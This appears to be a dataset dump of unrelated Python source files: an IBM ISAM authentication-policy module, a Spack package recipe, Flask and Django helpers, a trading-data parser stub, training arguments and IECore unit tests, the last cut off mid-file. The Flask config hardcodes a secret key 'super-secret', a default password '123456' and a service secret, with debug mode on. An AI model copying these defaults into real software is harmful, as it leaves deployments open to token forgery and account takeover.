text
stringlengths 2
999k
|
|---|
import logging
logger = logging.getLogger(__name__)
# "uri" variable already used so using a different name
module_uri = "/iam/access/v8/authentication/policies"
requires_modules = ["mga"]
requires_version = None
def get_all(isamAppliance, check_mode=False, force=False):
"""
Retrieve a list of authentication policies
"""
return isamAppliance.invoke_get("Retrieve a list of authentication policies", module_uri,
requires_modules=requires_modules, requires_version=requires_version)
def get(isamAppliance, name, check_mode=False, force=False):
"""
Retrieve a specific authentication policy
"""
ret_obj = search(isamAppliance, name)
if ret_obj['data'] != {}:
return _get(isamAppliance, ret_obj['data'])
else:
return isamAppliance.create_return_object()
def _get(isamAppliance, id):
"""
Retrieve a specific authentication policy
"""
return isamAppliance.invoke_get("Retrieve a specific authentication policy",
"{0}/{1}".format(module_uri, id), requires_modules=requires_modules,
requires_version=requires_version)
def set_file(isamAppliance, name, policy_file, uri, description="",
dialect="urn:ibm:security:authentication:policy:1.0:schema", enabled=None, check_mode=False, force=False):
# Read policy from file and call set()
with open(policy_file, 'r') as myfile:
policy = myfile.read().replace('\n', '')
return set(isamAppliance, name, policy, uri, description, dialect, enabled, check_mode, force)
def set(isamAppliance, name, policy, uri, description="", dialect="urn:ibm:security:authentication:policy:1.0:schema",
enabled=None, check_mode=False, force=False):
ret_obj = search(isamAppliance, name)
if ret_obj['data'] == {}:
return add(isamAppliance, name, policy, uri, description, dialect, enabled, check_mode, True)
else:
return update(isamAppliance, name, policy, uri, description, dialect, enabled, check_mode, force)
def add(isamAppliance, name, policy, uri, description="", dialect="urn:ibm:security:authentication:policy:1.0:schema",
enabled=None, check_mode=False, force=False):
"""
Duplicate and create an authentication policy
"""
if force is True or _check(isamAppliance, name=name) is False:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
warnings = []
json_data = {
"name": name,
"description": description,
"policy": policy,
"uri": uri,
"dialect": dialect
}
if enabled is not None:
if isamAppliance.facts["version"] < "9.0.2.1":
warnings.append(
"Appliance is at version: {0}. Enabled parameter not supported unless atleast 9.0.2.1. Ignoring value.".format(
isamAppliance.facts["version"]))
else:
json_data["enabled"] = enabled
return isamAppliance.invoke_post(
"Duplicate and create an authentication policy", module_uri, json_data,
requires_modules=requires_modules, requires_version=requires_version, warnings=warnings)
return isamAppliance.create_return_object()
def delete(isamAppliance, id, check_mode=False, force=False):
"""
Delete an authentication policy
"""
if force is True or _check(isamAppliance, id=id) is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
return isamAppliance.invoke_delete(
"Delete an authentication policy",
"{0}/{1}".format(module_uri, id), requires_modules=requires_modules, requires_version=requires_version)
return isamAppliance.create_return_object()
def update(isamAppliance, name, policy, uri, description="",
dialect="urn:ibm:security:authentication:policy:1.0:schema", enabled=None, check_mode=False, force=False):
"""
Update a specified authentication policy
"""
warnings = []
needs_update = False
json_data = {
"name": name,
"description": description,
"policy": policy,
"uri": uri,
"dialect": dialect
}
if enabled is not None:
if isamAppliance.facts["version"] < "9.0.2.1":
warnings.append(
"Appliance is at version: {0}. Enabled parameter not supported unless atleast 9.0.2.1. Ignoring value.".format(
isamAppliance.facts["version"]))
else:
json_data["enabled"] = enabled
if force is not True:
try:
ret_obj = get(isamAppliance, name)
id = ret_obj['data']['id']
del ret_obj['data']['id']
del ret_obj['data']['datecreated']
del ret_obj['data']['lastmodified']
del ret_obj['data']['userlastmodified']
del ret_obj['data']['predefined']
import ibmsecurity.utilities.tools
exist_data = ibmsecurity.utilities.tools.json_sort(ret_obj['data'])
new_data = ibmsecurity.utilities.tools.json_sort(json_data)
logger.debug("Existing Data: {0}".format(exist_data))
logger.debug("Provided Data: {0}".format(new_data))
if exist_data != new_data:
needs_update = True
except:
pass
if force is True or needs_update is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
return isamAppliance.invoke_put(
"Update a specified authentication policy",
"{0}/{1}".format(module_uri, id), json_data, requires_modules=requires_modules,
requires_version=requires_version, warnings=warnings)
return isamAppliance.create_return_object()
def _check(isamAppliance, id=None, name=None):
"""
Check if API Protection Definition already exists
"""
ret_obj = get_all(isamAppliance)
for obj in ret_obj['data']:
if (id is not None and obj['id'] == id) or (name is not None and obj['name'] == name):
return True
return False
def search(isamAppliance, name, check_mode=False, force=False):
"""
Retrieve the id for a given policy name
"""
ret_obj = isamAppliance.create_return_object()
ret_obj_all = get_all(isamAppliance)
for obj in ret_obj_all['data']:
if obj['name'] == name:
ret_obj['data'] = obj['id']
break
return ret_obj
def activate(isamAppliance, name, enabled=True, check_mode=False, force=False):
"""
Enable or disable a policy
"""
warnings = []
if isamAppliance.facts["version"] < "9.0.2.1":
warnings.append(
"Appliance is at version: {0}. Enabled parameter not supported unless atleast 9.0.2.1. Ignoring value.".format(
isamAppliance.facts["version"]))
else:
ret_obj = get(isamAppliance, name=name)
if force or ret_obj['data']['enabled'] != enabled:
if check_mode is True:
return isamAppliance.create_return_object(changed=True, warnings=warnings)
else:
return update(isamAppliance, name=name, policy=ret_obj['data']['policy'], uri=ret_obj['data']['uri'],
description=ret_obj['data']['description'], dialect=ret_obj['data']['dialect'],
enabled=enabled)
return isamAppliance.create_return_object(warnings=warnings)
def compare(isamAppliance1, isamAppliance2):
"""
Compare Authentication Policies between two appliances
"""
ret_obj1 = get_all(isamAppliance1)
ret_obj2 = get_all(isamAppliance2)
for obj in ret_obj1['data']:
del obj['id']
del obj['datecreated']
del obj['lastmodified']
del obj['userlastmodified']
ret_obj = _get(isamAppliance1, ret_obj1['data']['id'])
obj['policy'] = ret_obj['data']['policy']
for obj in ret_obj2['data']:
del obj['id']
del obj['datecreated']
del obj['lastmodified']
del obj['userlastmodified']
ret_obj = _get(isamAppliance2, ret_obj1['data']['id'])
obj['policy'] = ret_obj['data']['policy']
import ibmsecurity.utilities.tools
return ibmsecurity.utilities.tools.json_compare(ret_obj1, ret_obj2,
deleted_keys=['id', 'datecreated', 'lastmodified',
'userlastmodified'])
|
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack.package import *
class Dftfe(CMakePackage):
"""Real-space DFT calculations using Finite Elements"""
homepage = "https://sites.google.com/umich.edu/dftfe/"
url = "https://github.com/dftfeDevelopers/dftfe/archive/0.5.1.tar.gz"
maintainers = ['rmsds']
version('0.6.0', sha256='66b633a3aae2f557f241ee45b2faa41aa179e4a0bdf39c4ae2e679a2970845a1')
version('0.5.2', sha256='9dc4fa9f16b00be6fb1890d8af4a1cd3e4a2f06a2539df999671a09f3d26ec64')
version('0.5.1', sha256='e47272d3783cf675dcd8bc31da07765695164110bfebbbab29f5815531f148c1')
version('0.5.0', sha256='9aadb9a9b059f98f88c7756b417423dc67d02f1cdd2ed7472ba395fcfafc6dcb')
variant('scalapack', default=True, description='Use ScaLAPACK, strongly recommended for problem sizes >5000 electrons')
variant('build_type', default='Release',
description='The build type to build',
values=('Debug', 'Release'))
depends_on('mpi')
depends_on('dealii+p4est+petsc+slepc+int64+scalapack+mpi')
depends_on('dealii+p4est+petsc+slepc+int64+scalapack+mpi@9.0.0:', when='@0.5.1:')
depends_on('scalapack', when='+scalapack')
depends_on('alglib')
depends_on('libxc')
depends_on('spglib')
depends_on('libxml2')
def cmake_args(self):
spec = self.spec
args = [
'-DCMAKE_C_COMPILER={0}'.format(spec['mpi'].mpicc),
'-DCMAKE_CXX_COMPILER={0}'.format(spec['mpi'].mpicxx),
'-DALGLIB_DIR={0}'.format(spec['alglib'].prefix),
'-DLIBXC_DIR={0}'.format(spec['libxc'].prefix),
'-DXML_LIB_DIR={0}/lib'.format(spec['libxml2'].prefix),
'-DXML_INCLUDE_DIR={0}/include'.format(spec['libxml2'].prefix),
'-DSPGLIB_DIR={0}'.format(spec['spglib'].prefix),
]
if spec.satisfies('^intel-mkl'):
args.append('-DWITH_INTEL_MKL=ON')
else:
args.append('-DWITH_INTEL_MKL=OFF')
if spec.satisfies('%gcc'):
args.append('-DCMAKE_C_FLAGS=-fpermissive')
args.append('-DCMAKE_CXX_FLAGS=-fpermissive')
return args
@when('@:0.5.2')
def install(self, spec, prefix):
mkdirp(prefix.bin)
mkdirp(prefix.lib64)
install(join_path(self.build_directory, 'main'),
join_path(prefix.bin, 'dftfe'))
install(join_path(self.build_directory, 'libdftfe.so'),
prefix.lib64)
|
from contextlib import contextmanager
from typing import Iterator, List
from django.db import connection
from .exceptions import DatabaseAccessBlocked
@contextmanager
def block_db() -> Iterator[None]:
def blocker(*args: List) -> None:
raise DatabaseAccessBlocked
with connection.execute_wrapper(blocker):
yield
|
# encoding: utf-8
from os import path, getenv
from datetime import timedelta
import ast
basedir = path.abspath(path.dirname(__file__))
class Config (object):
APP_NAME = getenv('APP_NAME', 'Python Flask Boilerplate')
DEV = ast.literal_eval(getenv('DEV', 'True'))
DEBUG = ast.literal_eval(getenv('DEBUG', 'True'))
HOST = '0.0.0.0'
PORT = 5678
USER_DEFAULT_PASSWORD = '123456'
SQLALCHEMY_DATABASE_URI = getenv('SQLALCHEMY_DATABASE_URI', 'sqlite:///' + path.join(basedir, 'db.sqlite'))
SQLALCHEMY_TRACK_MODIFICATIONS = False
SQLALCHEMY_MIGRATE_REPO = path.join(basedir, 'db', 'db_repository')
'''Flask-JWT'''
SECRET_KEY = 'super-secret'
JWT_AUTH_URL_RULE = '/signin'
JWT_AUTH_USERNAME_KEY = 'name'
JWT_AUTH_PASSWORD_KEY = 'pwd'
JWT_EXPIRATION_DELTA = timedelta(seconds = 1800)
'''Docker-Network media-service container'''
MEDIA_SERVICE_RESTFUL_API_URL = getenv('MEDIA_SERVICE_RESTFUL_API_URL', 'http://localhost:8080/index/api')
MEDIA_SERVICE_SECRET = '035c73f7-bb6b-4889-a715-d9eb2d1925cc'
### SQLALCHEMY_DATABASE_URI = 'mysql://user:pass@server_ip:server_port/db_name'
current = Config
|
from wtpy import BaseExtParser
from wtpy import WTSTickStruct
from ctypes import byref
import threading
import time
from wtpy import WtDtEngine
class MyParser(BaseExtParser):
def __init__(self, id: str):
super().__init__(id)
self.__worker__ = None
def init(self, engine:WtEngine):
'''
初始化
'''
super().init(engine)
def random_sim(self):
while True:
curTick = WTSTickStruct()
curTick.code = bytes("IF2106", encoding="UTF8")
curTick.exchg = bytes("CFFEX", encoding="UTF8")
self.__engine__.push_quote_from_extended_parser(self.__id__, byref(curTick), True)
time.sleep(1)
def connect(self):
'''
开始连接
'''
print("connect")
if self.__worker__ is None:
self.__worker__ = threading.Thread(target=self.random_sim, daemon=True)
self.__worker__.start()
return
def disconnect(self):
'''
断开连接
'''
print("disconnect")
return
def release(self):
'''
释放,一般是进程退出时调用
'''
print("release")
return
def subscribe(self, fullCode:str):
'''
订阅实时行情\n
@fullCode 合约代码,格式如CFFEX.IF2106
'''
# print("subscribe: " + fullCode)
return
def unsubscribe(self, fullCode:str):
'''
退订实时行情\n
@fullCode 合约代码,格式如CFFEX.IF2106
'''
# print("unsubscribe: " + fullCode)
return
if __name__ == "__main__":
#创建一个运行环境,并加入策略
myParser = MyParser("test")
engine = WtDtEngine()
engine.initialize("dtcfg.yaml", "logcfgdt.yaml")
engine.add_exetended_parser(myParser)
engine.run()
kw = input('press any key to exit\n')
|
# home.py - app module for Codato home page.
__version__ = '0.1'
__all__ = ['layout', 'callback']
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
layout = html.Div([
html.Br(),
html.H3('Covid Data Tools'),
],
style={'padding':'10vw', 'text-align':'center'}
)
def callback(app):
pass
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
import os
import torch
import logging
logging.basicConfig(level=logging.INFO, format=' %(asctime)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
def get_settings():
import argparse
parser = argparse.ArgumentParser(description='Deep Stereo Matching by pytorch')
parser.add_argument('--mode', default='train',
help='mode of execute [train/finetune/val/submission')
# arguments of datasets
parser.add_argument('--datas_train', default='k2015-tr, k2012-tr',
help='datasets for training')
parser.add_argument('--datas_val', default='k2015-val, k2012-val',
help='datasets for validation')
parser.add_argument('--dir_datas_train', default='/media/qjc/D/data/kitti/',
help='dirpath of datasets for training')
parser.add_argument('--dir_datas_val', default='/media/qjc/D/data/kitti/',
help='dirpath of datasets for validation')
parser.add_argument('--bn', type=int, default=4,
help='batch size')
parser.add_argument('--crop_width', type=int, default=768,
help='width of crop_size')
parser.add_argument('--crop_height', type=int, default=384,
help='height of crop_size')
# arguments of model
parser.add_argument('--arch', default='DispNetC',
help='select arch of model')
parser.add_argument('--maxdisp', type=int ,default=192,
help='maxium disparity')
parser.add_argument('--loadmodel', default=None,
help='path of pretrained weight')
# arguments of lossfun
parser.add_argument('--loss_name', default='SV-SL1',
help='name of lossfun, supported as follow: \
SV-(SL1/CE/SL1+CE), \
DUSV-(A[S(1/2/3)]C(1/2)[-AD][-M], \
LUSV-(A[S(1/2/3)][-AD])/(AS(1/2/3)-EC)')
parser.add_argument('--flag_FC', action='store_true', default=False,
help='enables feature consistency')
parser.add_argument('--flag_FCTF', action='store_true', default=False,
help='enables the mode of training from coarse to fine')
parser.add_argument('--mode_down_disp', type=str ,default='avg',
help='mode of downsample disparity for training with multi-scale [avg/max]')
parser.add_argument('--mode_down_img', type=str ,default='Simple',
help='mode of downsample image for training with multi-scale [Simple/Gaussion/DoG]')
parser.add_argument('--nedge', type=int, default=64,
help='margin of image for learning disparity of region with occlution')
# arguments of optimizer
parser.add_argument('--freq_optim', type=int, default=1,
help='frequent of optimize weight')
parser.add_argument('--lr', type=float, default=0.001,
help='learnig rate')
parser.add_argument('--lr_epoch0', type=int, default=10,
help='the first epoch of adjust learnig rate')
parser.add_argument('--lr_stride', type=int, default=3,
help='epoch stride of adjust learnig rate')
parser.add_argument('--lr_decay', type=float, default=0.5,
help='decay factor of adjust learnig rate')
parser.add_argument('--weight_decay', type=float, default=0.0001,
help='decay factor of weight')
parser.add_argument('--beta1', type=float, default=0.9,
help='beta1 of Adam')
parser.add_argument('--beta2', type=float, default=0.999,
help='beta2 of Adam')
# arguments for training
parser.add_argument('--epochs', type=int, default=20,
help='number of epochs to train')
parser.add_argument('--nloop', type=int, default=1,
help='loop of dataset in a epoch')
parser.add_argument('--epochs_warmup', type=int, default=0,
help='number of epochs to warmup weight')
parser.add_argument('--freq_save', type=int, default=1,
help='frequent of save weight')
parser.add_argument('--freq_print', type=int, default=20,
help='frequent of print infomation')
# other arguments
parser.add_argument('--dir_save', default='./results/',
help='dirpath of save result( weight/submission )')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='enables CUDA training')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
# parser arguments
args = parser.parse_args()
# add arguments
args.cuda = (not args.no_cuda) and torch.cuda.is_available()
args.beta = (args.beta1, args.beta2)
args.crop_size = (args.crop_width, args.crop_height)
# log arguments
items = sorted(args.__dict__.items())
msg = 'The setted arguments as follow: \n'
msg += '\n'.join([' [%s]: %s' % (k, str(v)) for k, v in items])
logger.info(msg + '\n')
return args
# program entry
if __name__ == '__main__':
# get setting
args = get_settings()
# set gpu id used
os.environ["CUDA_VISIBLE_DEVICES"] = "0,1"
# set manual seed
torch.manual_seed(args.seed)
if args.cuda:
torch.cuda.manual_seed(args.seed)
# set manual seed
if(not os.path.isdir(args.dir_save)):
os.mkdir(args.dir_save)
# excute stereo program
import stereo
if(args.mode.lower() in ['train', 'finetune']):
stereo.train_val(args)
elif(args.mode.lower() in ['val', 'validation']):
stereo.val(args)
elif(args.mode.lower() in ['sub', 'submission']):
stereo.submission(args)
else:
logger.error('not support mode[ %s ]' % args.mode)
|
##########################################################################
#
# Copyright (c) 2012-2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
from IECore import *
class CompoundParameterTest( unittest.TestCase ) :
def testZEndGarbageCollection( self ):
import gc
# test if garbage collection is still working after all tests with compound parameters.
gc.collect()
RefCounted.collectGarbage()
self.assertEqual( RefCounted.numWrappedInstances(), 0 )
def testUserData( self ):
p = CompoundParameter( "n", "d", [], userData = CompoundObject( { "test": StringData("hi"), "test2": IntData(2), "test3": CompoundObject( { "test4": FloatData( 1.0 ) } ) } ) )
p2 = CompoundParameter( "n", "d", [], userData = { "test": StringData("hi"), "test2": IntData(2), "test3": { "test4": FloatData( 1.0 ) } } )
self.assertEqual( p.userData(), p2.userData() )
def testDerivedClassElement( self ):
class DerivedStringParameter( StringParameter ):
pass
p = DerivedStringParameter( "a", "a", "contents" )
c = CompoundParameter( "n", "d", members = [ p ] )
self.assertEqual( type( c[ "a" ] ), DerivedStringParameter )
def testDerivedClass( self ):
class DerivedCompoundParameter( CompoundParameter ):
def valueValid( self, value ) :
return ( True, "" )
p = DerivedCompoundParameter( "n", "d", members = [ StringParameter( "a", "a", "", presets = ( ( "b", StringData( "b" ) ), ), presetsOnly = True ) ] )
p.validate()
def testConstructor( self ) :
p = CompoundParameter( "n", "d" )
self.assertEqual( p.name, "n" )
self.assertEqual( p.description, "d" )
self.assertEqual( p.defaultValue, CompoundObject() )
self.assertEqual( len( p.keys() ), 0 )
self.assertEqual( len( p.values() ), 0 )
self.assertEqual( len( p ), 0 )
self.assertEqual (p.userData(), CompoundObject() )
p = CompoundParameter( "n", "d", [] )
self.assertEqual( p.name, "n" )
self.assertEqual( p.description, "d" )
self.assertEqual( p.defaultValue, CompoundObject() )
self.assertEqual( len( p.keys() ), 0 )
self.assertEqual( len( p.values() ), 0 )
self.assertEqual( len( p ), 0 )
self.assertEqual (p.userData(), CompoundObject() )
p = CompoundParameter(
name = "compound",
description = "innit nice",
members = [
IntParameter( "i", "d", 1 ),
FloatParameter( "f", "d", 2 ),
]
)
d = CompoundObject()
d["i"] = IntData( 1 )
d["f"] = FloatData( 2 )
self.assertEqual( p.name, "compound" )
self.assertEqual( p.description, "innit nice" )
self.assertEqual( p.defaultValue, d )
self.assertEqual( len( p.keys() ), 2 )
self.assertEqual( len( p.values() ), 2 )
self.assertEqual( len( p ), 2 )
self.assertEqual( p.keys(), ["i", "f"] )
self.assertEqual( p.values()[0].name, "i" )
self.assertEqual( p.values()[1].name, "f" )
def testConstDefaultValue( self ):
a = CompoundParameter( "a", "a desc",
members = [
StringParameter( "b", "b desc", "ok"),
]
)
c = a.getValue()
c["b"].value = 'error!'
self.assertEqual( a["b"].defaultValue.value, "ok")
def testUserData( self ):
compound = CompoundObject()
compound["first"] = IntData()
compound["second"] = QuatfData()
compound["third"] = StringData("test")
p = CompoundParameter( "n", "d", [], userData = compound )
self.assertEqual( p.userData(), compound )
self.assert_(not p.userData().isSame(compound) )
data = p.userData()
data["fourth"] = CharData('1')
data["first"] = data["fourth"]
def testAccess( self ) :
p = CompoundParameter(
name = "compound",
description = "innit nice",
members = [
IntParameter( "i", "d", 1 ),
FloatParameter( "f", "d", 2 ),
]
)
self.assertEqual( p["i"].name, "i" )
self.assertEqual( p.parameter( "i" ).name, "i" )
def testPresets( self ) :
p = CompoundParameter(
name = "c",
description = "d",
members = [
IntParameter( "i", "d", 1, presets = (
( "one", 1 ),
( "two", 2 ),
( "ambiguous", 4 ),
( "four", 4 ),
( "otherAmbiguous", 4 ),
),
presetsOnly = True,
),
FloatParameter( "f", "d", 2, presets = (
( "one", 1 ),
( "two", 2 ),
( "three", 3 ),
( "four", 4 ),
),
presetsOnly = True,
)
]
)
self.assertEqual( p.presetsOnly, True )
pr = p.getPresets()
self.assertEqual( len( pr ), 3 )
self.assert_( "one" in pr.keys() )
self.assert_( "two" in pr.keys() )
p.setValue( "two" )
self.assertEqual( p["i"].getValue().value, 2 )
self.assertEqual( p["f"].getValue().value, 2 )
self.assertEqual( p.getCurrentPresetName(), "two" )
p.setValue( "four" )
self.assertEqual( p.getCurrentPresetName(), "four" )
self.assertRaises( RuntimeError, p.setPresets, [] ) # CompoundParameter created with adoptChildPresets=True does not allow overriding presets
p = CompoundParameter(
name = "c",
description = "d",
members = [
IntParameter( "i", "d", 1, presets = (
( "one", 1 ),
( "two", 2 ),
),
presetsOnly = True,
),
FloatParameter( "f", "d", 1, presets = (
( "one", 1 ),
( "two", 2 ),
( "three", 3 ),
),
presetsOnly = True,
)
]
)
self.assertEqual( p.presetsOnly, True )
p = CompoundParameter(
name = "c",
description = "d",
)
self.assertEqual( p.presetsOnly, False )
self.assertEqual( len( p.getPresets() ), 0 )
def testLateValidation( self ) :
p = CompoundParameter(
name = "c",
description = "d",
members = [
IntParameter( "i", "d", 1 ),
FloatParameter( "f", "d", 2 )
]
)
p.validate()
p.setValue( CompoundObject( { "i" : IntData( 10 ), "f" : FloatData( 20 ) } ) )
p.validate()
self.assertEqual( p["i"].getValue(), IntData( 10 ) )
self.assertEqual( p["f"].getValue(), FloatData( 20 ) )
p.setValue( CompoundObject( { "i" : IntData( 10 ) } ) )
p.validate()
p.getValidatedValue()
p["f"].setValue( FloatData( 20 ) )
p.validate()
p.setValue( CompoundObject( { "idontbelong" : IntData( 10 ), "i" : IntData( 10 ), "f" : FloatData( 20 ) } ) )
self.assertRaises( RuntimeError, p.validate )
self.assertRaises( RuntimeError, p.getValidatedValue )
del p.getValue()["idontbelong"]
p.validate()
def testAddParameters( self ) :
p = CompoundParameter(
name = "c",
description = "d",
members = []
)
self.assertEqual( len( p ), 0 )
p.addParameters(
[
IntParameter( "i", "d", 1 ),
FloatParameter( "f", "d", 2 )
]
)
self.assertEqual( len( p ), 2 )
def testAddParametersDefault( self ) :
p = CompoundParameter(
name = "c",
description = "d",
members = []
)
self.assertEqual( p.defaultValue, CompoundObject() )
p.addParameter( IntParameter( name = "i", description = "d", defaultValue = 10 ) )
self.assertEqual( len( p.defaultValue ), 1 )
self.assertEqual( p.defaultValue, CompoundObject( { "i" : IntData( 10 ) } ) )
p.addParameter( FloatParameter( name = "f", description = "d", defaultValue = 20 ) )
self.assertEqual( len( p.defaultValue ), 2 )
self.assertEqual( p.defaultValue, CompoundObject( { "i" : IntData( 10 ), "f" : FloatData( 20 ) } ) )
def testRemoveParameters( self ) :
a = CompoundParameter( "a", "a desc",
members = [
StringParameter( "b", "b desc", "test 1 ok!"),
StringParameter( "d", "d desc", "test 2 failed!"),
]
)
c = a.getValue()
r = a.defaultValue
a.removeParameter( "d" )
r = a.defaultValue
try:
r['d']
except:
pass
else:
raise Exception, "Should have generated an exception."
r = a.getValue()
try:
r['d']
except:
pass
else:
raise Exception, "Should have generated an exception."
def testDelParameters( self ) :
a = CompoundParameter( "a", "a desc",
members = [
StringParameter( "b", "b desc", "test 1 ok!"),
StringParameter( "d", "d desc", "test 2 failed!"),
]
)
c = a.getValue()
r = a.defaultValue
del a["d"]
self.assert_( not "d" in a )
r = a.defaultValue
self.assert_( not "d" in r )
r = a.getValue()
self.assert_( not "d" in r )
def testAddParametersPresets( self ) :
p = CompoundParameter(
name = "c",
description = "d",
members = []
)
self.assertEqual( p.getPresets(), {} )
p.addParameter( IntParameter( name = "i", description = "d", defaultValue = 10, presets = ( ( "one", 1 ), ( "two", 2 ) ) ) )
self.assertEqual( len( p.getPresets() ), 2 )
self.assertEqual( p.getPresets(), { "one" : CompoundObject( { "i" : IntData( 1 ) } ), "two" : CompoundObject( { "i" : IntData( 2 ) } ) } )
fParam = FloatParameter( name = "f", description = "d", defaultValue = 20, presets = ( ( "one", 1 ), ) )
p.addParameter( fParam )
self.assertEqual( len( p.getPresets() ), 1 )
self.assertEqual( p.getPresets(), { "one" : CompoundObject( { "i" : IntData( 1 ), "f" : FloatData( 1 ) } ) } )
p.insertParameter( IntParameter( name = "x", description = "x", defaultValue = 10 ), fParam )
self.assertEqual( p.keys(), [ "i", "x", "f" ] )
def testSmartSetValue( self ):
"""Test python overwriting: smartSetValue()"""
p = CompoundParameter(
name = "c",
description = "d",
members = [
IntParameter( "i", "d", 1 ),
FloatParameter( "f", "d", 2 )
],
userData = CompoundObject( { "a": BoolData( False ) } )
)
q = CompoundParameter(
name = "c",
description = "d",
members = [
IntParameter( "i", "d", 10 ),
FloatParameter( "f", "d", 20 )
],
)
self.assert_( p["i"].getTypedValue() == 1 )
self.assert_( p["f"].getValue() == FloatData( 2 ) )
p.smartSetValue( CompoundObject( { "i": IntData(10), "f": FloatData(20) } ) )
self.assert_( p["i"].getTypedValue() == 10 )
self.assert_( p["f"].getValue() == FloatData( 20 ) )
p.smartSetValue( { "i": 4, "f": 4 } )
self.assert_( p["i"].getTypedValue() == 4 )
self.assert_( p["f"].getValue() == FloatData( 4 ) )
# adding another CompoundParameter
p.addParameter( q )
r = p.getValue().copy()
r['c']['i'].value = 15
self.assert_( p['c']['i'].getTypedValue() == 10 )
p.smartSetValue( r )
self.assert_( p['c']['i'].getTypedValue() == 15 )
p.smartSetValue( { 'i': 1, 'f': 2, 'c': { 'i': 3, 'f': 4 } } )
self.assert_( p['i'].getTypedValue() == 1 )
self.assert_( p['f'].getValue() == FloatData( 2 ) )
self.assert_( p['c']['i'].getTypedValue() == 3 )
self.assert_( p['c']['f'].getValue() == FloatData( 4 ) )
def testSmartSetItem( self ):
"""Test smart __setitem__"""
p = CompoundParameter(
name = "c",
description = "d",
members = [
IntParameter( "i", "d", 1 ),
],
)
self.assert_( p["i"].getTypedValue() == 1 )
p["i"] = 20
self.assert_( p["i"].getTypedValue() == 20 )
p["i"] = IntData(30)
self.assert_( p["i"].getTypedValue() == 30 )
def testAttributeAccessRemoval( self ) :
# we used to allow access to child parameters
# using the parent.child attribute notation, but
# after deprecating it in version 4 we removed it
# in version 5. check that it's removed.
p = CompoundParameter(
name = "c",
description = "d",
members = [
IntParameter( "i", "d", 1 ),
],
)
self.assertRaises( AttributeError, getattr, p, "i" )
def testParameterPath( self ) :
p = CompoundParameter(
name = "c",
description = "d",
members = [
IntParameter( "i", "d", 1, ),
FloatParameter( "f", "d", 2, ),
CompoundParameter( "c", "d", members = [
IntParameter( "j", "d", 10 ),
]
)
]
)
self.assertEqual( p.parameterPath( p["i"] ), [ "i" ] )
self.assertEqual( p.parameterPath( p["f"] ), [ "f" ] )
self.assertEqual( p.parameterPath( p["c"]["j"] ), [ "c", "j" ] )
self.assertEqual( p.parameterPath( IntParameter( "i", "d", 10 ) ), [] )
self.assertEqual( p["c"].parameterPath( p["c"]["j"] ), [ "j" ] )
def testParameterPathBug( self ) :
p = CompoundParameter( name="c", description="" )
p.addParameter(
CompoundParameter(
name = "n",
description = "",
members = [
IntParameter( name="i", description="", defaultValue = 1 ),
CompoundParameter( name="j", description="", members = [ IntParameter( "k", "", 10 ) ] )
]
)
)
self.assertEqual( p.parameterPath( p["n"]["i"] ), [ "n", "i" ] )
self.assertEqual( p.parameterPath( p["n"]["j"]["k"] ), [ "n", "j", "k" ] )
def testClearParameters( self ) :
a = CompoundParameter( "a", "a desc",
members = [
StringParameter( "b", "b desc", "test 1 ok!"),
StringParameter( "d", "d desc", "test 2 failed!"),
]
)
self.assertEqual( len( a ), 2 )
a.clearParameters()
self.assertEqual( len( a ), 0 )
self.assertEqual( a.keys(), [] )
self.assertEqual( a.values(), [] )
self.assertRaises( Exception, a.__getitem__, "b" )
self.assertRaises( Exception, a.__getitem__, "d" )
def testSetValueWithMissingData( self ) :
c = CompoundParameter()
c1 = StringParameter( "child1", "child1", "child1" )
c.addParameter( c1 )
preset = c.getValue()
c2 = StringParameter( "child2", "child2", "child2" )
c2value = c2.getValue()
c.addParameter( c2 )
c.setValue( preset )
self.assertEqual( c2value, c["child2"].getValue() )
def testItems( self ) :
a = CompoundParameter( "a", "a desc",
members = [
StringParameter( "b", "b desc", "test 1 ok!"),
StringParameter( "d", "d desc", "test 2 failed!"),
]
)
items = a.items()
self.assertEqual( len( items ), 2 )
self.assertEqual( len( items[0] ), 2 )
self.assertEqual( len( items[1] ), 2 )
self.assertEqual( items[0][0], "b" )
self.assertEqual( items[1][0], "d" )
self.failUnless( items[0][1].isSame( a["b"] ) )
self.failUnless( items[1][1].isSame( a["d"] ) )
def testValueValidReason( self ) :
i = IntParameter( "i", "", 1, 0, 10 )
c = CompoundParameter(
"c",
members = [
i
]
)
childReason = i.valueValid( IntData( 20 ) )[1]
compoundReason = c.valueValid( CompoundObject( { "i" : IntData( 20 ) } ) )[1]
self.assertEqual( compoundReason, "i : " + childReason )
cc = CompoundParameter(
